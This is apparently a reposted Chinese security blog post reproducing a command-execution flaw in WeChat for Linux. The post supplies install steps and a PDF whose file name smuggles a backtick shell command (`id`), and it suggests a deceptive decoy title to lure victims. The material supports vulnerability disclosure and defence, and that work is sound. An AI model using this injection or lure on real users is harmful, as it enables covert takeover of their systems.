文章总结： 文档披露了WeChatforLinux版本存在高危RCE漏洞，攻击者可通过制作特定命名的恶意PDF文件触发任意命令执行。文章成功复现漏洞并给出详细环境配置步骤（安装字体、部署软件）和漏洞利用方法（命令嵌入文件名），但未明确触发机制。该漏洞可直接控制目标服务器，建议用户及时更新防护。 综合评分： 73 文章分类： 漏洞分析,渗透测试,WEB安全,红队,应急响应

Wechat for Linux 最新RCE漏洞成功复现

原创

flower flower

flower安全

2026年2月10日 15:48 甘肃

在小说阅读器读本章

去阅读

01

漏洞简介

Cybersecurity

漏洞类型：RCE漏洞

漏洞危害：高危

影响版本：WeChat For Linux

漏洞描述：可直接执行任意指令从而控制目标服务器

复现情况：成功复现

触发机制：未知

02

漏洞复现

Cybersecurity

（1）环境准备：

下载WeChat For Linux：

安装字体：

sudo apt-get install fonts-noto-cjk

执行命令：

sudo dpkg -i WeChatLinux_x86_64.deb

（2）漏洞复现：

制作PDF文件：

另存为PDF文件，并按以下命名规则命名PDF文件（可在实际命令前添加混淆文字实现对用户的欺骗）：

`id`.pdf  ##在``写入需要执行的命令也可为 某某科室工作汇报文件``.pdf

使用WeChat For Linux运行Pdf文件：

成功复现！

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：flower安全 flower flower《Wechat for Linux 最新RCE漏洞成功复现》